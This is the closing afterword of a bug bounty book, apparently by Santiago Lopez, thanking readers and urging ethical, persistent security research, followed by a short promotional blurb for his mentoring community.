Throughout these pages, we have explored together the exciting world of Bug Bounty, from its technical basics to the most advanced strategies for finding and reporting vulnerabilities. We have shared experiences, tips and insights that I hope have been useful to you in your own journey as a security researcher.

Now, as we come to the end of this book, I want to share some final words from my heart, as a friend and partner in this exciting adventure.

First, I want to express my sincere thanks to you, dear reader, for joining me on this journey. Your interest and dedication to cybersecurity are inspiring, and I am honored to have been able to share my knowledge and experiences with you.

Throughout my career, I have learned that success in Bug Bounty is not just about technical skills, but also about passion, perseverance, and a constant growth mindset. I have learned that collaboration and mutual support are critical to the progress of the community, and that ethics and accountability are essential pillars to building a safer digital environment.

I have been fortunate to experience firsthand the positive impact Bug Bounty can have on the security of companies and their users. Every vulnerability I've discovered and reported has been a small victory in the fight against cyber threats, and that fills me with pride and satisfaction.

But the most important thing I've learned is that Bug Bounty is much more than a career or a way to make money. It's a passion, a community and an opportunity to make a difference in the world. It is a way to use our skills and knowledge to protect people and businesses from the dangers of cyberspace.

My wish for you, dear reader, is that you find the same passion and satisfaction in Bug Bounty that I have found. May you be inspired to constantly learn and grow, to collaborate with other researchers, and to use your skills to make the digital world a safer place.

And who knows, maybe you will be the next Santiago Lopez, the next millionaire hacker to make Bug Bounty history. The future is in your hands!

Thank you for reading my book and for being part of this amazing community - I wish you every success in your journey as a security researcher!

With gratitude and admiration,

Santiago Lopez

Translation: Santiago Lopez, Tomas Lopez



MILLIONAIRE RECORDS

As founder of the $1 Million Dollar Club, Santiago generously shares his experience, knowledge, and strategies with an exclusive community of security experts and entrepreneurs, offering unique courses, personalized mentoring, and an invaluable network.

"MY BIGGEST DREAM RIGHT NOW IS TO CREATE NEW MILLIONAIRES AND CHANGE PEOPLE'S LIVES"
